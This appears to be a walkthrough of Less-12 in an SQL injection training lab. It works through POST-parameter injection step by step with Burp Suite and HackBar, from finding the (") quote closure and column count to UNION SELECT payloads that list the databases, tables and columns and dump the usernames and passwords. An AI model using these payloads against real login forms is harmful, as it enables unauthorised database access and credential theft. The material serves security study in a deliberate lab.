Less-12 POST parameters
Since the parameters are sent via POST, first capture the request with Burp Suite and inspect the request body to see how the parameters are passed.
With the request body in hand, use the "Post data" feature of the HackBar extension to carry out the injection tests.
Determine the closing form of the quoting:
uname=' or 1=1 #&passwd=&submit=Submit    login fails
uname=") or 1=1 #&passwd=&submit=Submit    login succeeds; this shows that an injection point exists and that the input is wrapped as ("")
Use ORDER BY to determine the number of columns:
uname=") order by 3 #&passwd=&submit=Submit    error shown: Unknown column '3' in 'order clause'
uname=") order by 2 #&passwd=&submit=Submit    no error, so the column count is 2
Determine which positions are displayed:
(Strictly speaking this step can be skipped: there are only 2 columns and the page echoes 2 values, so they correspond one to one.)
uname=") union select 1,2#&passwd=&submit=Submit
Get the current database:
uname=") union select 1,database() #&passwd=&submit=Submit
Get the names of all databases:
uname=") union select 1,(select group_concat(schema_name) from information_schema.schemata limit 0,1) #&passwd=&submit=Submit
Get the tables in the security database:
uname=") union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security' )#&passwd=&submit=Submit
Get the columns of the users table:
uname=") union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')#&passwd=&submit=Submit
Get the contents of the username column:
uname=") union select 1,(select group_concat(username) from security.users)#&passwd=&submit=Submit
Get the contents of the password column:
uname=") union select 1,(select group_concat(password) from security.users)#&passwd=&submit=Submit
Output username and password joined together:
uname=") union select 1,(select group_concat(concat_ws('~~',username,password)) from security.users)#&passwd=&submit=Submit